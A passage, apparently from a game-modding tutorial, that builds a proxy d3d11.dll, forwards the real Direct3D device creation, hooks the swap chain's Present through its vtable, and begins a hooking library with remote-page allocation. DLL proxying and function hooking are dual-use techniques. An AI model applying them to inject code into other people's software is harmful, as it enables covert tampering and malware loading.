<span class="n">UINT</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">IASetVertexBuffers</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">vertex_buffer</span><span class="p">,</span> <span class="o">&</span><span class="n">stride</span><span class="p">,</span> <span class="o">&</span><span class="n">offset</span><span class="p">);</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">IASetPrimitiveTopology</span><span class="p">(</span><span class="n">D3D11_PRIMITIVE_TOPOLOGY_TRIANGLELIST</span><span class="p">);</span>
<span class="n">devCon</span><span class="o">-></span><span class="n">Draw</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">fn_DXGISwapChain_Present</span> <span class="n">DXGISwapChain_Present_Orig</span><span class="p">;</span>
<span class="n">PopAddress</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="o">&</span><span class="n">DXGISwapChain_Present_Orig</span><span class="p">));</span>
<span class="n">HRESULT</span> <span class="n">r</span> <span class="o">=</span> <span class="n">DXGISwapChain_Present_Orig</span><span class="p">(</span><span class="n">thisPtr</span><span class="p">,</span> <span class="n">SyncInterval</span><span class="p">,</span> <span class="n">Flags</span><span class="p">);</span>
<span class="k">return</span> <span class="n">r</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">LoadShaders</span><span class="p">()</span>
<span class="p">{</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">filepath</span><span class="p">[</span><span class="mi">512</span><span class="p">];</span>
<span class="n">HMODULE</span> <span class="n">hModule</span> <span class="o">=</span> <span class="n">GetModuleHandle</span><span class="p">(</span><span class="nb">NULL</span><span class="p">);</span>
<span class="n">GetModuleFileNameA</span><span class="p">(</span><span class="n">hModule</span><span class="p">,</span> <span class="n">filepath</span><span class="p">,</span> <span class="mi">512</span><span class="p">);</span>
<span class="n">PathRemoveFileSpecA</span><span class="p">(</span><span class="n">filepath</span><span class="p">);</span>
<span class="n">strcat_s</span><span class="p">(</span><span class="n">filepath</span><span class="p">,</span> <span class="mi">512</span><span class="p">,</span> <span class="s">"</span><span class="se">\\</span><span class="s">hook_content</span><span class="se">\\</span><span class="s">passthrough_vs.shader"</span><span class="p">);</span>
<span class="kt">wchar_t</span> <span class="n">wPath</span><span class="p">[</span><span class="mi">513</span><span class="p">];</span>
<span class="kt">size_t</span> <span class="n">outSize</span><span class="p">;</span>
<span class="n">mbstowcs_s</span><span class="p">(</span><span class="o">&</span><span class="n">outSize</span><span class="p">,</span> <span class="o">&</span><span class="n">wPath</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">strlen</span><span class="p">(</span><span class="n">filepath</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">filepath</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">filepath</span><span class="p">));</span>
<span class="n">ID3D10Blob</span><span class="o">*</span> <span class="n">compileErrors</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">HRESULT</span> <span class="n">err</span> <span class="o">=</span> <span class="n">D3DCompileFromFile</span><span class="p">(</span><span class="n">wPath</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="s">"main"</span><span class="p">,</span> <span class="s">"vs_5_0"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">vs_blob</span><span class="p">,</span> <span class="o">&</span><span class="n">compileErrors</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">compileErrors</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">OutputDebugStringA</span><span class="p">((</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">compileErrors</span><span class="o">-></span><span class="n">GetBufferPointer</span><span class="p">());</span>
<span class="n">compileErrors</span><span class="o">-></span><span class="n">Release</span><span class="p">();</span>
<span class="p">}</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span> <span class="o">==</span> <span class="n">S_OK</span><span class="p">);</span> <span class="c1">//vs_blob is only valid if compilation succeeded</span>
<span class="n">err</span> <span class="o">=</span> <span class="n">device</span><span class="o">-></span><span class="n">CreateVertexShader</span><span class="p">(</span><span class="n">vs_blob</span><span class="o">-></span><span class="n">GetBufferPointer</span><span class="p">(),</span> <span class="n">vs_blob</span><span class="o">-></span><span class="n">GetBufferSize</span><span class="p">(),</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">&</span><span class="n">vs</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span> <span class="o">==</span> <span class="n">S_OK</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">filepath</span><span class="p">[</span><span class="mi">512</span><span class="p">];</span>
<span class="n">HMODULE</span> <span class="n">hModule</span> <span class="o">=</span> <span class="n">GetModuleHandle</span><span class="p">(</span><span class="nb">NULL</span><span class="p">);</span>
<span class="n">GetModuleFileNameA</span><span class="p">(</span><span class="n">hModule</span><span class="p">,</span> <span class="n">filepath</span><span class="p">,</span> <span class="mi">512</span><span class="p">);</span>
<span class="n">PathRemoveFileSpecA</span><span class="p">(</span><span class="n">filepath</span><span class="p">);</span>
<span class="n">strcat_s</span><span class="p">(</span><span class="n">filepath</span><span class="p">,</span> <span class="mi">512</span><span class="p">,</span> <span class="s">"</span><span class="se">\\</span><span class="s">hook_content</span><span class="se">\\</span><span class="s">vertex_color_ps.shader"</span><span class="p">);</span>
<span class="kt">wchar_t</span> <span class="n">wPath</span><span class="p">[</span><span class="mi">513</span><span class="p">];</span>
<span class="kt">size_t</span> <span class="n">outSize</span><span class="p">;</span>
<span class="n">mbstowcs_s</span><span class="p">(</span><span class="o">&</span><span class="n">outSize</span><span class="p">,</span> <span class="o">&</span><span class="n">wPath</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">strlen</span><span class="p">(</span><span class="n">filepath</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">filepath</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">filepath</span><span class="p">));</span>
<span class="n">ID3D10Blob</span><span class="o">*</span> <span class="n">compileErrors</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">HRESULT</span> <span class="n">err</span> <span class="o">=</span> <span class="n">D3DCompileFromFile</span><span class="p">(</span><span class="n">wPath</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="s">"main"</span><span class="p">,</span> <span class="s">"ps_5_0"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">ps_blob</span><span class="p">,</span> <span class="o">&</span><span class="n">compileErrors</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">compileErrors</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">OutputDebugStringA</span><span class="p">((</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">compileErrors</span><span class="o">-></span><span class="n">GetBufferPointer</span><span class="p">());</span>
<span class="n">compileErrors</span><span class="o">-></span><span class="n">Release</span><span class="p">();</span>
<span class="p">}</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span> <span class="o">==</span> <span class="n">S_OK</span><span class="p">);</span> <span class="c1">//ps_blob is only valid if compilation succeeded</span>
<span class="n">err</span> <span class="o">=</span> <span class="n">device</span><span class="o">-></span><span class="n">CreatePixelShader</span><span class="p">(</span><span class="n">ps_blob</span><span class="o">-></span><span class="n">GetBufferPointer</span><span class="p">(),</span> <span class="n">ps_blob</span><span class="o">-></span><span class="n">GetBufferSize</span><span class="p">(),</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">&</span><span class="n">ps</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span> <span class="o">==</span> <span class="n">S_OK</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">CreateMesh</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">const</span> <span class="kt">float</span> <span class="n">vertData</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mf">0.1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span>
<span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mf">0.1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span>
<span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mf">0.1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">1</span>
<span class="p">};</span>
<span class="n">D3D11_BUFFER_DESC</span> <span class="n">vertBufferDesc</span><span class="p">;</span>
<span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&</span><span class="n">vertBufferDesc</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">vertBufferDesc</span><span class="p">));</span>
<span class="n">vertBufferDesc</span><span class="p">.</span><span class="n">Usage</span> <span class="o">=</span> <span class="n">D3D11_USAGE_DEFAULT</span><span class="p">;</span>
<span class="n">vertBufferDesc</span><span class="p">.</span><span class="n">ByteWidth</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">float</span><span class="p">)</span> <span class="o">*</span> <span class="mi">6</span> <span class="o">*</span> <span class="mi">3</span><span class="p">;</span> <span class="c1">//6 floats per vert, 3 verts</span>
<span class="n">vertBufferDesc</span><span class="p">.</span><span class="n">BindFlags</span> <span class="o">=</span> <span class="n">D3D11_BIND_VERTEX_BUFFER</span><span class="p">;</span>
<span class="n">vertBufferDesc</span><span class="p">.</span><span class="n">CPUAccessFlags</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">vertBufferDesc</span><span class="p">.</span><span class="n">MiscFlags</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">D3D11_SUBRESOURCE_DATA</span> <span class="n">vertBufferData</span><span class="p">;</span>
<span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&</span><span class="n">vertBufferData</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">vertBufferData</span><span class="p">));</span>
<span class="n">vertBufferData</span><span class="p">.</span><span class="n">pSysMem</span> <span class="o">=</span> <span class="n">vertData</span><span class="p">;</span>
<span class="n">HRESULT</span> <span class="n">res</span> <span class="o">=</span> <span class="n">device</span><span class="o">-></span><span class="n">CreateBuffer</span><span class="p">(</span><span class="o">&</span><span class="n">vertBufferDesc</span><span class="p">,</span> <span class="o">&</span><span class="n">vertBufferData</span><span class="p">,</span> <span class="o">&</span><span class="n">vertex_buffer</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">res</span> <span class="o">==</span> <span class="n">S_OK</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">CreateInputLayout</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">D3D11_INPUT_ELEMENT_DESC</span> <span class="n">vertElements</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="p">{</span><span class="s">"POSITION"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">DXGI_FORMAT_R32G32B32_FLOAT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span><span class="n">D3D11_INPUT_PER_VERTEX_DATA</span><span class="p">,</span> <span class="mi">0</span><span class="p">},</span>
<span class="p">{</span><span class="s">"COLOR"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">DXGI_FORMAT_R32G32B32_FLOAT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="n">D3D11_INPUT_PER_VERTEX_DATA</span><span class="p">,</span> <span class="mi">0</span><span class="p">}</span>
<span class="p">};</span>
<span class="n">HRESULT</span> <span class="n">err</span> <span class="o">=</span> <span class="n">device</span><span class="o">-></span><span class="n">CreateInputLayout</span><span class="p">(</span><span class="n">vertElements</span><span class="p">,</span> <span class="n">_countof</span><span class="p">(</span><span class="n">vertElements</span><span class="p">),</span> <span class="n">vs_blob</span><span class="o">-></span><span class="n">GetBufferPointer</span><span class="p">(),</span> <span class="n">vs_blob</span><span class="o">-></span><span class="n">GetBufferSize</span><span class="p">(),</span> <span class="o">&</span><span class="n">vertLayout</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span> <span class="o">==</span> <span class="n">S_OK</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">CreateRasterizerAndDepthStates</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">D3D11_RASTERIZER_DESC</span> <span class="n">soliddesc</span><span class="p">;</span>
<span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&</span><span class="n">soliddesc</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">D3D11_RASTERIZER_DESC</span><span class="p">));</span>
<span class="n">soliddesc</span><span class="p">.</span><span class="n">FillMode</span> <span class="o">=</span> <span class="n">D3D11_FILL_SOLID</span><span class="p">;</span>
<span class="n">soliddesc</span><span class="p">.</span><span class="n">CullMode</span> <span class="o">=</span> <span class="n">D3D11_CULL_NONE</span><span class="p">;</span>
<span class="n">HRESULT</span> <span class="n">err</span> <span class="o">=</span> <span class="n">device</span><span class="o">-></span><span class="n">CreateRasterizerState</span><span class="p">(</span><span class="o">&</span><span class="n">soliddesc</span><span class="p">,</span> <span class="o">&</span><span class="n">SolidRasterState</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span> <span class="o">==</span> <span class="n">S_OK</span><span class="p">);</span>
<span class="n">D3D11_DEPTH_STENCIL_DESC</span> <span class="n">depthDesc</span><span class="p">;</span>
<span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&</span><span class="n">depthDesc</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">D3D11_DEPTH_STENCIL_DESC</span><span class="p">));</span>
<span class="n">depthDesc</span><span class="p">.</span><span class="n">DepthEnable</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
<span class="n">depthDesc</span><span class="p">.</span><span class="n">DepthWriteMask</span> <span class="o">=</span> <span class="n">D3D11_DEPTH_WRITE_MASK_ALL</span><span class="p">;</span>
<span class="n">depthDesc</span><span class="p">.</span><span class="n">DepthFunc</span> <span class="o">=</span> <span class="n">D3D11_COMPARISON_ALWAYS</span><span class="p">;</span>
<span class="n">err</span> <span class="o">=</span> <span class="n">device</span><span class="o">-></span><span class="n">CreateDepthStencilState</span><span class="p">(</span><span class="o">&</span><span class="n">depthDesc</span><span class="p">,</span> <span class="o">&</span><span class="n">SolidDepthStencilState</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span> <span class="o">==</span> <span class="n">S_OK</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">fn_D3D11CreateDeviceAndSwapChain</span> <span class="nf">LoadD3D11AndGetOriginalFuncPointer</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">path</span><span class="p">[</span><span class="n">MAX_PATH</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">GetSystemDirectoryA</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">MAX_PATH</span><span class="p">))</span> <span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">strcat_s</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">MAX_PATH</span> <span class="o">*</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">char</span><span class="p">),</span> <span class="s">"</span><span class="se">\\</span><span class="s">d3d11.dll"</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="n">d3d_dll</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="n">path</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">d3d_dll</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Could Not Locate Original D3D11 DLL"</span><span class="p">),</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Darn"</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="p">(</span><span class="n">fn_D3D11CreateDeviceAndSwapChain</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">d3d_dll</span><span class="p">,</span> <span class="s">"D3D11CreateDeviceAndSwapChain"</span><span class="p">);</span> <span class="c1">//GetProcAddress only takes narrow strings, so no TEXT() here</span>
<span class="p">}</span>
<span class="kr">inline</span> <span class="kt">void</span><span class="o">**</span> <span class="nf">get_vtable_ptr</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">obj</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="o">*</span><span class="k">reinterpret_cast</span><span class="o"><</span><span class="kt">void</span><span class="o">***></span><span class="p">(</span><span class="n">obj</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">extern</span> <span class="s">"C"</span> <span class="n">HRESULT</span> <span class="kr">__stdcall</span> <span class="nf">D3D11CreateDeviceAndSwapChain</span><span class="p">(</span>
<span class="n">IDXGIAdapter</span> <span class="o">*</span> <span class="n">pAdapter</span><span class="p">,</span>
<span class="n">D3D_DRIVER_TYPE</span> <span class="n">DriverType</span><span class="p">,</span>
<span class="n">HMODULE</span> <span class="n">Software</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">Flags</span><span class="p">,</span>
<span class="k">const</span> <span class="n">D3D_FEATURE_LEVEL</span> <span class="o">*</span> <span class="n">pFeatureLevels</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">FeatureLevels</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">SDKVersion</span><span class="p">,</span>
<span class="k">const</span> <span class="n">DXGI_SWAP_CHAIN_DESC</span> <span class="o">*</span> <span class="n">pSwapChainDesc</span><span class="p">,</span>
<span class="n">IDXGISwapChain</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppSwapChain</span><span class="p">,</span>
<span class="n">ID3D11Device</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppDevice</span><span class="p">,</span>
<span class="n">D3D_FEATURE_LEVEL</span> <span class="o">*</span> <span class="n">pFeatureLevel</span><span class="p">,</span>
<span class="n">ID3D11DeviceContext</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppImmediateContext</span>
<span class="p">)</span>
<span class="p">{</span>
<span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Calling D3D11CreateDeviceAndSwapChain"</span><span class="p">),</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Ok"</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">fn_D3D11CreateDeviceAndSwapChain</span> <span class="n">D3D11CreateDeviceAndSwapChain_Orig</span> <span class="o">=</span> <span class="n">LoadD3D11AndGetOriginalFuncPointer</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">D3D11CreateDeviceAndSwapChain_Orig</span><span class="p">)</span> <span class="k">return</span> <span class="n">E_FAIL</span><span class="p">;</span> <span class="c1">//couldn't find the real d3d11.dll</span>
<span class="n">HRESULT</span> <span class="n">res</span> <span class="o">=</span> <span class="n">D3D11CreateDeviceAndSwapChain_Orig</span><span class="p">(</span><span class="n">pAdapter</span><span class="p">,</span> <span class="n">DriverType</span><span class="p">,</span> <span class="n">Software</span><span class="p">,</span> <span class="n">Flags</span><span class="p">,</span> <span class="n">pFeatureLevels</span><span class="p">,</span> <span class="n">FeatureLevels</span><span class="p">,</span> <span class="n">SDKVersion</span><span class="p">,</span> <span class="n">pSwapChainDesc</span><span class="p">,</span> <span class="n">ppSwapChain</span><span class="p">,</span> <span class="n">ppDevice</span><span class="p">,</span> <span class="n">pFeatureLevel</span><span class="p">,</span> <span class="n">ppImmediateContext</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">FAILED</span><span class="p">(</span><span class="n">res</span><span class="p">)</span> <span class="o">||</span> <span class="o">!</span><span class="n">ppSwapChain</span> <span class="o">||</span> <span class="o">!</span><span class="n">ppDevice</span> <span class="o">||</span> <span class="o">!</span><span class="n">ppImmediateContext</span><span class="p">)</span> <span class="k">return</span> <span class="n">res</span><span class="p">;</span> <span class="c1">//nothing to hook</span>
<span class="n">HRESULT</span> <span class="n">hr</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">ppDevice</span><span class="p">)</span><span class="o">-></span><span class="n">QueryInterface</span><span class="p">(</span><span class="kr">__uuidof</span><span class="p">(</span><span class="n">ID3D11Device5</span><span class="p">),</span> <span class="p">(</span><span class="kt">void</span><span class="o">**</span><span class="p">)</span><span class="o">&</span><span class="n">device</span><span class="p">);</span>
<span class="n">hr</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">ppImmediateContext</span><span class="p">)</span><span class="o">-></span><span class="n">QueryInterface</span><span class="p">(</span><span class="kr">__uuidof</span><span class="p">(</span><span class="n">ID3D11DeviceContext</span><span class="p">),</span> <span class="p">(</span><span class="kt">void</span><span class="o">**</span><span class="p">)</span><span class="o">&</span><span class="n">devCon</span><span class="p">);</span>
<span class="n">LoadShaders</span><span class="p">();</span>
<span class="n">CreateMesh</span><span class="p">();</span>
<span class="n">CreateInputLayout</span><span class="p">();</span>
<span class="n">CreateRasterizerAndDepthStates</span><span class="p">();</span>
<span class="n">swapChain</span> <span class="o">=</span> <span class="o">*</span><span class="n">ppSwapChain</span><span class="p">;</span>
<span class="kt">void</span><span class="o">**</span> <span class="n">swapChainVTable</span> <span class="o">=</span> <span class="n">get_vtable_ptr</span><span class="p">(</span><span class="n">swapChain</span><span class="p">);</span>
<span class="c1">//Present is slot 8 of the IDXGISwapChain vtable: it follows the 3 IUnknown, 4 IDXGIObject, and 1 IDXGIDeviceSubObject methods</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">swapChainVTable</span><span class="p">[</span><span class="mi">8</span><span class="p">],</span> <span class="n">DXGISwapChain_Present_Hook</span><span class="p">);</span>
<span class="k">return</span> <span class="n">res</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ul_reason_for_call</span> <span class="o">==</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Target app has loaded your proxy d3d11.dll and called DllMain. If you're launching Skyrim via Steam, you need to dismiss this popup quickly, otherwise you get a load error."</span><span class="p">),</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Success"</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
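<p>The proxy code above finds <code>Present</code> by reading slot 8 out of the swap chain's vtable. Here is a minimal, portable sketch of that lookup. It assumes only that the object's first pointer-sized field is the vtable pointer, which is how COM objects are laid out. <code>FakeSwapChain</code>, <code>FakePresent</code>, <code>kPresentSlot</code> and <code>demo_present_lookup</code> are hypothetical names made up for illustration and are not part of the project. The real code hands the address it finds to <code>InstallHook</code> rather than calling it directly.</p>

```cpp
#include <cassert>
#include <cstddef>

// Hypothetical stand-in for a COM object: like a real IDXGISwapChain, its
// first pointer-sized field is the address of a table of function pointers.
struct FakeSwapChain
{
    void** vtable;
    int presentCalls;
};

// Shaped like the Present hook: an explicit "this", then the arguments.
using PresentFn = long (*)(void* thisPtr, unsigned syncInterval, unsigned flags);

// Hypothetical Present implementation that just counts how often it runs.
static long FakePresent(void* thisPtr, unsigned /*syncInterval*/, unsigned /*flags*/)
{
    static_cast<FakeSwapChain*>(thisPtr)->presentCalls++;
    return 0; // same value as S_OK
}

// Same helper as the proxy DLL: read the vtable pointer stored at offset 0.
inline void** get_vtable_ptr(void* obj)
{
    return *reinterpret_cast<void***>(obj);
}

// IDXGISwapChain slot layout: 0-2 IUnknown, 3-6 IDXGIObject,
// 7 IDXGIDeviceSubObject::GetDevice, 8 IDXGISwapChain::Present.
constexpr std::size_t kPresentSlot = 8;

// Builds a fake swap chain, looks Present up by slot index, calls it once,
// and returns how many times Present ran.
int demo_present_lookup()
{
    static void* table[kPresentSlot + 1] = {};
    table[kPresentSlot] = reinterpret_cast<void*>(&FakePresent);

    FakeSwapChain sc{ table, 0 };
    void* presentAddr = get_vtable_ptr(&sc)[kPresentSlot]; // what InstallHook would receive
    PresentFn present = reinterpret_cast<PresentFn>(presentAddr);
    present(&sc, 1, 0);
    return sc.presentCalls;
}
```

<p>Calling <code>demo_present_lookup()</code> exercises the whole path: build the table, fetch slot 8, call through it. The slot index is the only fragile part, since it depends on the interface's inheritance chain staying the same.</p>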
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Hooking Code (Click To Expand)</summary>
<p>Hooking.h:</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="cp">#pragma once
#include <Windows.h>
#include <stdint.h>
</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunc</span><span class="p">);</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">noinline</span><span class="p">)</span> <span class="kt">void</span> <span class="nf">PopAddress</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">trampolinePtr</span><span class="p">);</span></code></pre></figure>
<p>Hooking.cpp:</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="cp">#include "hooking.h"
#include <Windows.h>
#include <stack>
#include <stdio.h>
#include <memoryapi.h>
#include <wow64apiset.h> // for checking if process is 64 bit
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h
#include <Psapi.h>
#include <stdint.h>
#include "capstone/x86.h"
#include "capstone/capstone.h"
#include "debug.h"
</span>
<span class="k">thread_local</span> <span class="n">std</span><span class="o">::</span><span class="n">stack</span><span class="o"><</span><span class="kt">uint64_t</span><span class="o">></span> <span class="n">hookJumpAddresses</span><span class="p">;</span>
<span class="cp">#if _WIN64
</span><span class="k">typedef</span> <span class="kt">uint64_t</span> <span class="n">addr_t</span><span class="p">;</span>
<span class="cp">#else
</span><span class="k">typedef</span> <span class="kt">uint32_t</span> <span class="n">addr_t</span><span class="p">;</span>
<span class="cp">#endif
</span>
<span class="kt">bool</span> <span class="nf">IsProcess64Bit</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">BOOL</span> <span class="n">isWow64</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="n">IsWow64Process</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="o">&</span><span class="n">isWow64</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">isWow64</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//process is 32 bit, running on 64 bit machine</span>
<span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="k">return</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">wProcessorArchitecture</span> <span class="o">==</span> <span class="n">PROCESSOR_ARCHITECTURE_AMD64</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocPageInTargetProcess</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
